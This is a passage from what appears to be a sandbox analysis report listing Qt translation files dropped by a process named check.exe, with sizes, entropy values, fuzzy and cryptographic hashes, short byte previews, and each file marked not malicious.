                                                                                                                                                                                                                                      SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                                                      SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):130
                                                                                                                                                                                                                                      Entropy (8bit):4.024232093209084
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                                                      MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                                                      SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                                                      SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                                                      SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                                                      MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                                                      SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                                                      SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                                                      SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.631479835393124
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                                                      MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                                                      SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                                                      SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                                                      SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                                                      MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                                                      SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                                                      SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                                                      SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                                                      MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                                                      SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                                                      SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
                                                                                                                                                                                                                                      SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                                                      MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                                                      SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                                                      SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                                                      SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                                                      MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                                                      SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                                                      SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                                                      SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):293121
                                                                                                                                                                                                                                      Entropy (8bit):5.272179385890926
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                                                      MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                                                      SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                                                      SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                                                      SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117
                                                                                                                                                                                                                                      Entropy (8bit):3.739162292019161
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                                                      MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                                                      SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
                                                                                                                                                                                                                                      SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                                                      SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.680458675741643
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                                                      MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                                                      SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                                                      SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                                                      SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70
                                                                                                                                                                                                                                      Entropy (8bit):4.463523104731333
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                                                      MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                                                      SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                                                      SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                                                      SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):323590
                                                                                                                                                                                                                                      Entropy (8bit):4.568068046062524
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                                                      MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                                                      SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                                                      SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                                                      SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):83
                                                                                                                                                                                                                                      Entropy (8bit):3.880645689209568
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                                                      MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                                                      SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                                                      SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                                                      SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8743
                                                                                                                                                                                                                                      Entropy (8bit):5.189558605179696
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                                                      MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                                                      SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                                                      SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                                                      SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10599
                                                                                                                                                                                                                                      Entropy (8bit):5.192287379770591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                                                      MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                                                      SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                                                      SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                                                      SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7444
                                                                                                                                                                                                                                      Entropy (8bit):4.580794980254807
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                                                      MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                                                      SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                                                      SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                                                      SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):15297
                                                                                                                                                                                                                                      Entropy (8bit):4.708378368926237
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                                                      MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                                                      SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                                                      SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                                                      SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4795
                                                                                                                                                                                                                                      Entropy (8bit):4.530246422531362
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                                                      MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                                                      SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                                                      SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                                                      SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7570
                                                                                                                                                                                                                                      Entropy (8bit):4.550982634910665
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                                                      MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                                                      SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                                                      SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                                                      SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10704
                                                                                                                                                                                                                                      Entropy (8bit):4.481291573289571
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                                                      MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                                                      SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                                                      SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                                                      SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10922
                                                                                                                                                                                                                                      Entropy (8bit):4.459946393010639
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                                                      MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                                                      SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                                                      SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                                                      SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10891
